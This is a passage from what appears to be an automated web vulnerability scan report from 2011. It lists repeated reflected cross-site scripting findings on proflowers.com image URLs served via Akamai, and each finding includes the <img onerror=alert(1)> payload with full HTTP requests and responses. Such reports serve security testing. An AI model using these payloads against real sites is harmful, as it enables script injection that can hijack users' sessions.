GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img src=a onerror=alert(1)>550117928d0

1.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2 was submitted in the REST URL parameter 9. This input was echoed as b57ec<img src=a onerror=alert(1)>8ac26b53db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PFb57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12assrt_gv10_PFb57ec<img src=a onerror=alert(1)>8ac26b53db2

1.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea was submitted in the REST URL parameter 9. This input was echoed as 2a5a2<img src=a onerror=alert(1)>220f35153ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img src=a onerror=alert(1)>220f35153ea

1.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9 was submitted in the REST URL parameter 9. This input was echoed as 80316<img src=a onerror=alert(1)>5b91b361cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img src=a onerror=alert(1)>5b91b361cb9

1.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b was submitted in the REST URL parameter 9. This input was echoed as c0749<img src=a onerror=alert(1)>3cf25d69d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img src=a onerror=alert(1)>3cf25d69d4b

1.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893 was submitted in the REST URL parameter 9. This input was echoed as 9481e<img src=a onerror=alert(1)>4b0ca80c893 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img src=a onerror=alert(1)>4b0ca80c893

1.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c was submitted in the REST URL parameter 9. This input was echoed as 4673a<img src=a onerror=alert(1)>c73a060d77c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12white50_09_l4673a<img src=a onerror=alert(1)>c73a060d77c

1.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f was submitted in the REST URL parameter 9. This input was echoed as c45fd<img src=a onerror=alert(1)>becc4bb494f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PFc45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/ROS18red40_gv11_PFc45fd<img src=a onerror=alert(1)>becc4bb494f

1.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6 was submitted in the REST URL parameter 9. This input was echoed as 4e5f4<img src=a onerror=alert(1)>757198edcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img src=a onerror=alert(1)>757198edcc6

1.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd was submitted in the REST URL parameter 9. This input was echoed as 9397a<img src=a onerror=alert(1)>6dfee76ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img src=a onerror=alert(1)>6dfee76ddd

1.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b was submitted in the REST URL parameter 9. This input was echoed as 3f820<img src=a onerror=alert(1)>765038f592b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img src=a onerror=alert(1)>765038f592b

1.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9 was submitted in the REST URL parameter 9. This input was echoed as a2e58<img src=a onerror=alert(1)>5024d153cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img src=a onerror=alert(1)>5024d153cf9

1.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745 was submitted in the REST URL parameter 9. This input was echoed as 5a67f<img src=a onerror=alert(1)>9bcc720745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:57 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img src=a onerror=alert(1)>9bcc720745

1.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716 was submitted in the REST URL parameter 9. This input was echoed as c866d<img src=a onerror=alert(1)>154ac83e716 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tnc866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/RubyVase_tnc866d<img src=a onerror=alert(1)>154ac83e716

1.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef was submitted in the REST URL parameter 9. This input was echoed as 5603a<img src=a onerror=alert(1)>7a612d79cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img src=a onerror=alert(1)>7a612d79cef

1.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
